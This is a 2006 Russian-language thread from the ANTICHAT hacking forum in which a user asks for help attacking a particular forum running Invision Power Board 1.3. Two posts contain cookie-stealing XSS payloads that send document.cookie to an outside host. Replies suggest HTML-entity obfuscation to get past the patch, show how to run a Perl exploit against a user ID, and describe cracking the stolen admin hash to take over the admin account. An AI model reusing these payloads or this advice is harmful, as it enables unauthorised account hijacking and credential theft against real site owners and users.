HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу Invision 1.3 Xss ?
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Invision 1.3 Xss ?
  #1  
Старый 23.05.2006, 17:26
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
С нами: 10885346

Репутация: 2947


По умолчанию Invision 1.3 Xss ?
Нужна поиощь есть форум

http://forum.низя ссылки.ru

Powered by Invision Power Board(U) v1.3 Final © 2003 IPS, Inc.

На нем я использовал


[E*MAIL][U*RL=wj`=`][/U*RL][/E*MAIL]]` style=`background:url(javascript:document.images[1].src="http://antichat.org/s/slider.gif?"+document.cookie)`

Дыру закрыли

То ест теперь видя этот XSS Непроисходит никаких действий то есть подпись такой же становится как содержимое XSS

Помогите зашифровать его или другой способ!!

Пробовал через картинку! (Вродь картинку поставил но Hash пароля не пришол) За ранее thank's
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось Azazel; 23.05.2006 в 17:35..
 
Ответить с цитированием

  #2  
Старый 25.05.2006, 18:31
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
С нами: 10915586

Репутация: 54
По умолчанию
Попробуй зашифровать некоторые фрагменты сплойта тут:
_http://www.h4cky0u.org/encrypt/index.php
в кодировку HTML Entities
 
Ответить с цитированием

  #3  
Старый 25.05.2006, 20:08
em00s7
Участник форума
Регистрация: 02.05.2006
Сообщений: 193
С нами: 10539834

Репутация: 25
Smile
ТЫ не пробывал Этот эксплоит
 
Ответить с цитированием

  #4  
Старый 26.05.2006, 18:44
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
С нами: 10885346

Репутация: 2947


По умолчанию
Как использовать сплойт на forum.test.ru ID юзера 123
perl 1.pl test.ru /forum/ 123 0

Так?
 
Ответить с цитированием

  #5  
Старый 26.05.2006, 18:53
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
С нами: 10885346

Репутация: 2947


По умолчанию
Нашол другой XSS

Можно ли его вставиить в картинку ??

wj@wj.com ` style=`background:url(javascript:document.images[1].src="http://antichat.org/s/slider.gif?"+document.cookie);
 
Ответить с цитированием

  #6  
Старый 26.05.2006, 19:54
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
С нами: 11200586

Репутация: 1398


По умолчанию
да зачем тебе с XSS париться. Вот паренёк дал сплойт. Запускай вводи типо C:\bin\perl.exe C:\file.pl http://lol.ru forum/ 1 0. И всё хэш админа твой. Теперь в руки passwords pro и ты поимел админа аккаунт.
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #7  
Старый 01.06.2006, 13:01
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
С нами: 10885346

Репутация: 2947


По умолчанию
Ладно ЗАКРЫЛИ!

Непрошол exploit
Последний раз редактировалось slider; 01.06.2006 в 13:46..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Active XSS in Invision Power Board 2.1.4 k00p3r Уязвимости 8 03.03.2006 20:51
Вопрос по использованию XSS на Powered by Invision Power Board(U) v1.3 Final rsha1988 Уязвимости CMS / форумов 12 15.02.2005 01:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.